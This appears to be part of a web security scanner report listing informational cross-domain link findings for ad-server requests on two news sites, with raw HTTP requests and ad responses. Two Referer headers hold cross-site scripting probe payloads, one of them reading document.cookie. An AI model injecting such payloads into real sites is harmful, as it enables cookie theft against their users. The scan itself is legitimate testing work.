http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-79489099_1296252890,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=917199;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.6830512962769717?

The response contains the following link to another domain:

http://redcated/AVE/view/286764367/direct;wi.300;hi.250/01/161809

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-79489099_1296252890,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=917199;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.6830512962769717? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:14:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3839

document.write('<iframe src=\"http://view.atdmt.com/AVE/iview/286764367/direct;wi.300;hi.250/01/161809?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/e%3B234367361%3B0-0%3B0%3B44779888%3B
...[SNIP]...
aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/AVE/go/286764367/direct;wi.300;hi.250/01/161809" target="_blank"><img src="http://view.atdmt.com/AVE/view/286764367/direct;wi.300;hi.250/01/161809"/></a>
...[SNIP]...

17.76. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=199062;contx=Miscellaneous;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.3579352851957083?

The response contains the following link to another domain:

http://redcated/AVE/view/286764367/direct;wi.300;hi.250/01/7524026

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-48597195_1296251864,11d765b6a10b1b3,Miscellaneous,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=199062;contx=Miscellaneous;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.3579352851957083? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 21:57:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3178

document.write('<iframe src=\"http://view.atdmt.com/AVE/iview/286764367/direct;wi.300;hi.250/01/7524026?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/e%3B234367361%3B0-0%3B0%3B44779888%3
...[SNIP]...
btg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/AVE/go/286764367/direct;wi.300;hi.250/01/7524026" target="_blank"><img src="http://view.atdmt.com/AVE/view/286764367/direct;wi.300;hi.250/01/7524026"/></a>
...[SNIP]...

17.77. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-85794731_1296251888,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=262895;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.33319127024151385?

The response contains the following link to another domain:

http://redcated/CNT/view/286211276/direct;wi.300;hi.250/01/7547542

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-85794731_1296251888,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=262895;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.33319127024151385? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 21:58:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4054

document.write('<iframe src=\"http://view.atdmt.com/CNT/iview/286211276/direct;wi.300;hi.250/01/7547542?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/p%3B234577320%3B0-0%3B0%3B44779888%3
...[SNIP]...
a1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/CNT/go/286211276/direct;wi.300;hi.250/01/7547542" target="_blank"><img src="http://view.atdmt.com/CNT/view/286211276/direct;wi.300;hi.250/01/7547542"/></a>
...[SNIP]...

17.78. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.rev_bostonherald/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-83450342_1296254125,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=782666;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_m;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.1877197385765612?

The response contains the following link to another domain:

http://redcated/CRS/view/286443367/direct/01/1396325

Request

GET /adj/cm.rev_bostonherald/;net=cm;u=,cm-83450342_1296254125,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=782666;contx=ent;an=20;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_m;btg=bk.rdst1;btg=mm.aa1;btg=mm.ac1;btg=mm.ad1;btg=mm.ae5;btg=mm.af5;btg=mm.ak1;btg=mm.ap5;btg=mm.aq1;btg=mm.ar1;btg=mm.au1;btg=mm.da1;btg=mm.db2;btg=ex.32;btg=ex.76;btg=qc.a;ord=0.1877197385765612? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:35:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 3774

document.write('<iframe src=\"http://view.atdmt.com/CRS/iview/286443367/direct/01/1396325?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/o%3B234029658%3B0-0%3B2%3B44779888%3B4307-300/250%
...[SNIP]...
3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3fhttp://clk.redcated/CRS/go/286443367/direct/01/1396325" target="_blank"><img src="http://view.atdmt.com/CRS/view/286443367/direct/01/1396325"/></a>
...[SNIP]...

17.79. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/classified previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbi.wrgb.cbs6albany/classified

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/classified;s1=classified;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=oodle.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=3232293233741075?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg

Request

GET /adj/fbi.wrgb.cbs6albany/classified;s1=classified;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=oodle.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=3232293233741075? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?taxonomy=classified&cname=section&shier=classified&ghier=classified&trackbyurl=wrgb&usetitle=true&domain=cbs6albany.oodle.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 14:27:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 312

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/c;234764637;0-0;0;36776316;3454-728/90;40474377/40492164/1;;~sscs=%3fhttp://mariacollege.edu/"><img src="http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.80. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbi.wrgb.cbs6albany/entertainment

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment;s1=entertainment;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=cbs6albany.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9968673593830318?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg

Request

GET /adj/fbi.wrgb.cbs6albany/entertainment;s1=entertainment;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=cbs6albany.com;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9968673593830318? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:54:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 312

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/m;234764637;0-0;0;36776750;3454-728/90;40474377/40492164/1;;~sscs=%3fhttp://mariacollege.edu/"><img src="http://s0.2mdn.net/viewad/2362004/Maria_728x90_AAD2-10_40K.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.81. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbi.wrgb.cbs6albany/entertainment/events

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/entertainment/events;s1=entertainment;s2=events;pos=2;dcode=fbi;pcode=wrgb;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=2;sz=300x250;ord=6144302128814161?

The response contains the following link to another domain:

http://s0.2mdn.net/2418884/PID_1510902_turningstone.jpg

Request

GET /adj/fbi.wrgb.cbs6albany/entertainment/events;s1=entertainment;s2=events;pos=2;dcode=fbi;pcode=wrgb;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=2;sz=300x250;ord=6144302128814161? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/albany-ny/events/performing+artsa1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 14:28:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 31836

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
m1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/3/0/%2a/q%3B234996344%3B0-0%3B0%3B36776785%3B4307-300/250%3B40166379/40184165/1%3B%3B%7Esscs%3D%3fhttp://www.turningstone.com/"><IMG SRC="http://s0.2mdn.net/2418884/PID_1510902_turningstone.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

17.82. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/weather previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/fbi.wrgb.cbs6albany/weather

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/weather;s1=weather;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9032834577374160?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2418884/WRGB728x90.jpg

Request

GET /adj/fbi.wrgb.cbs6albany/weather;s1=weather;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9032834577374160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 13:38:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 302

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/q;234748582;0-0;0;36777459;3454-728/90;40139686/40157473/1;;~sscs=%3fhttp://www.turningstone.com/"><img src="http://s0.2mdn.net/viewad/2418884/WRGB728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.83. http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/iblocal.revinet.bostonherald/audience

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-90228043_1296254385,11d765b6a10b1b3,ent,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m;;sz=728x90;net=iblocal;env=ifr;ord1=322199;contx=ent;dc=w;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_m;ord=0.8110197517089546?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2915957/2-90355.1010_728x903_tx.jpg

Request

GET /adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-90228043_1296254385,11d765b6a10b1b3,ent,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m;;sz=728x90;net=iblocal;env=ifr;ord1=322199;contx=ent;dc=w;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_m;ord=0.8110197517089546? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:39:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 838

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a9d/0/0/%2a/h;234129315;1-0;0;57964437;3454-728/90;39960420/39978207/1;u=,iblocal-90228043_1296254385,11d765b6a10b1b3,ent,e
...[SNIP]...
an-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m;~aopt=2/0/ff/0;~sscs=%3fhttps://osc.hscil.com/tx/Quoting/BCBSQuickQuoteB.aspx?source=TXC3064320&WT.mc_id=TXC3064320"><img src="http://s0.2mdn.net/viewad/2915957/2-90355.1010_728x903_tx.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.84. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The page was loaded from a URL containing a query string:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAo